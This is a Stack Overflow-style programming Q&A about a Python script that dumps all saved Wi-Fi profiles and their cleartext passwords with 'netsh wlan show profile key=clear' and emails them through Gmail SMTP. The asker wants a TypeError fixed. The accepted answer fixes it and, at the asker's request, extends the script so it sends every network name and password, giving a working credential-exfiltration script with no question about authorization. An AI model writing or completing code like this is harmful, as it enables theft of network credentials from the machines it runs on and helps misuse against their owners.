# TypeError: expected string or bytes-like object.where do i change it to string?

Tags: python, python-3.x, smtp

when i try to run this python :

```
import subprocess, smtplib
def send_mail(email,password,message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email,password)
    server.sendmail(email, email, message)
    server.quit()

a = subprocess.check_output(['netsh','wlan','show','profiles']).decode('utf-8').split('\n')
a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i]
for i in a:
    results = subprocess.check_output(['netsh','wlan','show','profile',i,'key=clear']).decode('utf-8').split('\n')
    results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
    try:
        print ("{:<30}| {:<}".format(i, results[0]))
    except IndexError:
        print ("{:<30}| {:<}".format(i,""))
send_mail("example@gmail.com","Example123",results)
```

i get this error

```
Traceback (most recent call last):
  File "wifi.py", line 18, in <module>
    send_mail("Example@gmail.com","Example123",results)
  File "wifi.py", line 6, in send_mail
    server.sendmail(email, email, message)
  File "C:\Users\TARUN\AppData\Local\Programs\Python\Python38-32\lib\smtplib.py", line 886, in sendmail
    (code, resp) = self.data(msg)
  File "C:\Users\TARUN\AppData\Local\Programs\Python\Python38-32\lib\smtplib.py", line 568, in data
    q = _quote_periods(msg)
  File "C:\Users\TARUN\AppData\Local\Programs\Python\Python38-32\lib\smtplib.py", line 176, in _quote_periods
    return re.sub(br'(?m)^\.', b'..', bindata)
  File "C:\Users\TARUN\AppData\Local\Programs\Python\Python38-32\lib\re.py", line 210, in sub
    return _compile(pattern, flags).sub(repl, string, count)
TypeError: expected string or bytes-like object
```

i understand that i need to put 'str' somewhere but i don't know which part(i'm kinda new to python)

Comment: `results` is a list, not a string. Try converting it to a string in whatever way you chose (one example is `results = ' '.join(results)`)

Comment: Can you please remove your Username and password from the Error description?

Comment: sorry i forgot to remove that,it's done.

Answer (score 0, accepted):

you have results as list just convert it into string This will send both username and pwd

```
import subprocess, smtplib
def send_mail(email,password,message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email,password)
    server.sendmail(email, email, message)
    server.quit()

a = subprocess.check_output(['netsh','wlan','show','profiles']).decode('utf-8').split('\n')
a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i]
to_send = []
for i in a:
    results = subprocess.check_output(['netsh','wlan','show','profile',i,'key=clear']).decode('utf-8').split('\n')
    results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
    # in order to send everything store it in another list and then join them with new line.
    to_send.append(i+":"+"".join(results))
    try:
        print ("{:<30}| {:<}".format(i, results[0]))
    except IndexError:
        print ("{:<30}| {:<}".format(i,""))
# convert list to string
send_mail("example@gmail.com","Example123","\n".join(to_send))
```

Comment: Thank's that  worked.But what if i want the whole output sent to my mail? im getting only one line sent to the mail.

Comment: I have edited the code so that it sends the whole output

Comment: Thank you so very much.But anyway i can also send the wifi names?only passwords are being sent to mail.

Comment: That should do it dude